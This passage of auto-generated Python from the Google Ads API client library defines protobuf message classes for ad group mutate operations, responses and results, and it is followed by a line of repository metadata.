create (google.ads.googleads.v6.resources.types.AdGroup):
Create operation: No resource name is
expected for the new ad group.
update (google.ads.googleads.v6.resources.types.AdGroup):
Update operation: The ad group is expected to
have a valid resource name.
remove (str):
Remove operation: A resource name for the removed ad group
is expected, in this format:
``customers/{customer_id}/adGroups/{ad_group_id}``
"""
update_mask = proto.Field(proto.MESSAGE, number=4,
message=field_mask.FieldMask,
)
create = proto.Field(proto.MESSAGE, number=1, oneof='operation',
message=gagr_ad_group.AdGroup,
)
update = proto.Field(proto.MESSAGE, number=2, oneof='operation',
message=gagr_ad_group.AdGroup,
)
remove = proto.Field(proto.STRING, number=3, oneof='operation')
class MutateAdGroupsResponse(proto.Message):
r"""Response message for an ad group mutate.
Attributes:
partial_failure_error (google.rpc.status_pb2.Status):
Errors that pertain to operation failures in the partial
failure mode. Returned only when partial_failure = true and
all errors occur inside the operations. If any errors occur
outside the operations (e.g. auth errors), we return an RPC
level error.
results (Sequence[google.ads.googleads.v6.services.types.MutateAdGroupResult]):
All results for the mutate.
"""
partial_failure_error = proto.Field(proto.MESSAGE, number=3,
message=status.Status,
)
results = proto.RepeatedField(proto.MESSAGE, number=2,
message='MutateAdGroupResult',
)
class MutateAdGroupResult(proto.Message):
r"""The result for the ad group mutate.
Attributes:
resource_name (str):
Returned for successful operations.
ad_group (google.ads.googleads.v6.resources.types.AdGroup):
The mutated ad group with only mutable fields after mutate.
The field will only be returned when response_content_type
is set to "MUTABLE_RESOURCE".
"""
resource_name = proto.Field(proto.STRING, number=1)
ad_group = proto.Field(proto.MESSAGE, number=2,
message=gagr_ad_group.AdGroup,
)
__all__ = tuple(sorted(__protobuf__.manifest))
|
[
"bazel-bot-development[bot]@users.noreply.github.com"
] |
bazel-bot-development[bot]@users.noreply.github.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.